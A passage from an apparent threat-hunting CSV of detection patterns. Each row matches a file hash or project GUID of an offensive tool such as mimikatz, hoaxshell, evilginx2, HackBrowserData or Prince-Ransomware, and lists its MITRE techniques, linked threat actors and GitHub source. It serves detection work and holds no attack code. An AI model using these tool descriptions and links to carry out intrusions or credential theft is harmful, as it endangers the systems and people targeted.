T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26986" "*56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634*",".{0,1000}56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26988" "*56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634*",".{0,1000}56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - 
APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26989" "*56cd70d3ff5abc405f93173f800ce0f9e641d4f979e395e3c9e7e9e61f8b1e5f*",".{0,1000}56cd70d3ff5abc405f93173f800ce0f9e641d4f979e395e3c9e7e9e61f8b1e5f.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","26992" "*56cf1962ceb2af061aec2e6fd85949b5da5d3ac5da13e9c776f44d15577003e5*",".{0,1000}56cf1962ceb2af061aec2e6fd85949b5da5d3ac5da13e9c776f44d15577003e5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26993" 
"*56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc*",".{0,1000}56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","26994" "*56d3be8ac6590cb5e593768aa36d4a0d6c39de5c96942e312876c3e0069edeae*",".{0,1000}56d3be8ac6590cb5e593768aa36d4a0d6c39de5c96942e312876c3e0069edeae.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","26995" "*56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be*",".{0,1000}56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26996" "*56d7ecdb29ba7613c88c1c5c5f8f3cc88e62a526f0c57d792e43ede489abb6ab*",".{0,1000}56d7ecdb29ba7613c88c1c5c5f8f3cc88e62a526f0c57d792e43ede489abb6ab.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26998" "*56e10f1223e7eedb84c5a96f4374565228382393551941b5e15e13127b9e890f*",".{0,1000}56e10f1223e7eedb84c5a96f4374565228382393551941b5e15e13127b9e890f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27000" "*56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a*",".{0,1000}56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27001" "*56e1e8e6e7add2849ee78462abb30ea40c23d6a1e06036473f82d214bafa9f9a*",".{0,1000}56e1e8e6e7add2849ee78462abb30ea40c23d6a1e06036473f82d214bafa9f9a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27002" "*56ebb8c6ef6890131b7e4c459ae9877a4e0a68500aee14f0c0f55a250c626c87*",".{0,1000}56ebb8c6ef6890131b7e4c459ae9877a4e0a68500aee14f0c0f55a250c626c87.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27004" "*56f3c70dd9cb4be15fb429491245d75ce48a4cb9d8877f2be6e2493673674606*",".{0,1000}56f3c70dd9cb4be15fb429491245d75ce48a4cb9d8877f2be6e2493673674606.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - 
TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27005" "*56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821*",".{0,1000}56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","27007" "*56f8e538e4959c62f8d9d5f672a48ebea7883ec573e6df3f4dae69a5f8156eb9*",".{0,1000}56f8e538e4959c62f8d9d5f672a48ebea7883ec573e6df3f4dae69a5f8156eb9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27008" "*56F981FD-634A-4656-85A7-5636658E1F94*",".{0,1000}56F981FD\-634A\-4656\-85A7\-5636658E1F94.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","27010" 
"*56fa384aada24362640f70277b54bf5d91c3befaf445e5428a60cd44fba2fba1*",".{0,1000}56fa384aada24362640f70277b54bf5d91c3befaf445e5428a60cd44fba2fba1.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","27011" "*570f6aa0a1c8ad869469cb1dc28b9be6c24fb037f5be2acefbf777dc765eb06b*",".{0,1000}570f6aa0a1c8ad869469cb1dc28b9be6c24fb037f5be2acefbf777dc765eb06b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27012" "*570fdc96b43d7e2bc8ee5166053950ff2e235fe741a81ca3733555d1f03a91f7*",".{0,1000}570fdc96b43d7e2bc8ee5166053950ff2e235fe741a81ca3733555d1f03a91f7.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","27013" "*571ccefde4608492c83836e28b50ebbf92d740d99de43ea35df85f2cf32d9b77*",".{0,1000}571ccefde4608492c83836e28b50ebbf92d740d99de43ea35df85f2cf32d9b77.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance 
techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27014" "*571e01606bbaaab8febd88396cb3dd97eb8e883e6597d6a881f8c736eff5a05d*",".{0,1000}571e01606bbaaab8febd88396cb3dd97eb8e883e6597d6a881f8c736eff5a05d.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","27015" "*5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36*",".{0,1000}5721ff8bccba2fec3918c3464b519d9b02b69f0cc69639eaa8964174d4cc6e36.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","27017" "*572542904260191ebdf338ac8d2f3dc38057236e8373e35f08f6297850c62f8d*",".{0,1000}572542904260191ebdf338ac8d2f3dc38057236e8373e35f08f6297850c62f8d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27018" "*57269059f0f5e8e510d304e8368975291e4b583c4d5388375ea122e46b8ff357*",".{0,1000}57269059f0f5e8e510d304e8368975291e4b583c4d5388375ea122e46b8ff357.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping 
of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27019" "*5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f*",".{0,1000}5738fd3f47fb386d8cf45ff598545140f51b3b6507fa549dafc43c51dd27488f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27023" "*573b83b3dc86832085eca5958fa11c0b5874edb3fdf84a016a21a8cc40454ea2*",".{0,1000}573b83b3dc86832085eca5958fa11c0b5874edb3fdf84a016a21a8cc40454ea2.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27025" "*573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd*",".{0,1000}573ea06d067eeed688c7bc60b367e0b47059a6af03ad5b4d53bb90549894a0bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27026" "*5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61*",".{0,1000}5740d6067561fcd27239374abbfd7076d3df5909b107a32bbb2e9eec0e9f4d61.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27027" 
"*574584f229e8812dd5a924880611e84120da7589b86a3417fecce77687720ebb*",".{0,1000}574584f229e8812dd5a924880611e84120da7589b86a3417fecce77687720ebb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27029" "*5745976E-48A7-4F79-9BAA-82D1F43D1261*",".{0,1000}5745976E\-48A7\-4F79\-9BAA\-82D1F43D1261.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","27030" "*5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a*",".{0,1000}5751db8dd5b4407b720b3bea4b8e33b560a8f0879318bb3327bd7e4f102af12a.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27032" "*575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff*",".{0,1000}575b267a045e31d3616cfdcc275c8bb6617136b1446253ee2954104b199276ff.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27036" "*57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2*",".{0,1000}57630a0b38ad185ff8a8d0706ff9cebfd12f47526ceeeb90cc3a17e124316fe2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27040" "*5767888351c96bd64880150630f6271d79c3a88053967a7b01da85b74b1ed7fe*",".{0,1000}5767888351c96bd64880150630f6271d79c3a88053967a7b01da85b74b1ed7fe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27042" "*5767c1bb1b6d4391d8536b2c0736820fee8f7f1b0017c754a6ee7deccbc693b4*",".{0,1000}5767c1bb1b6d4391d8536b2c0736820fee8f7f1b0017c754a6ee7deccbc693b4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27043" "*57681a07f437b52ecf05f2b1a6f268c5d3596c9627280d3ddc2750a20b7d5dcf*",".{0,1000}57681a07f437b52ecf05f2b1a6f268c5d3596c9627280d3ddc2750a20b7d5dcf.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","27044" "*576908f3dccaced486894a56a256a88dea369d97302e1793f17660f7062d0c22*",".{0,1000}576908f3dccaced486894a56a256a88dea369d97302e1793f17660f7062d0c22.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27046" "*5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437*",".{0,1000}5776b8a6c27e3375134e81fe72a0eebf781029ff5e05683fdc58459741a7c437.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27050" "*577b289bf6f2a7353f4fb0f6a8a84103f6583710a08d8ff1e1fb817b45cccaa4*",".{0,1000}577b289bf6f2a7353f4fb0f6a8a84103f6583710a08d8ff1e1fb817b45cccaa4.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","27051" "*577b85630ecfd64d6817de11c4abf256512d299f70998c8c531202272123b202*",".{0,1000}577b85630ecfd64d6817de11c4abf256512d299f70998c8c531202272123b202.{0,1000}","offensive_tool_keyword","spinningteacup","identify different 
parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27052" "*57808871665b988de85ec19ab01960cb6c88aea9c996d5b9f6115ec60070a949*",".{0,1000}57808871665b988de85ec19ab01960cb6c88aea9c996d5b9f6115ec60070a949.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27053" "*5782C660-DD26-40DC-B06C-B9275371EC55*",".{0,1000}5782C660\-DD26\-40DC\-B06C\-B9275371EC55.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","27054" "*578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577*",".{0,1000}578a42cf90cf1bcc569f925d7909bbedd2756367906d2875a23cbc8bb1628577.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","27056" "*578b34b94963895dd57cb223ad0a79b17dc8d2c71bfdf8f977a5903e326ba7eb*",".{0,1000}578b34b94963895dd57cb223ad0a79b17dc8d2c71bfdf8f977a5903e326ba7eb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 
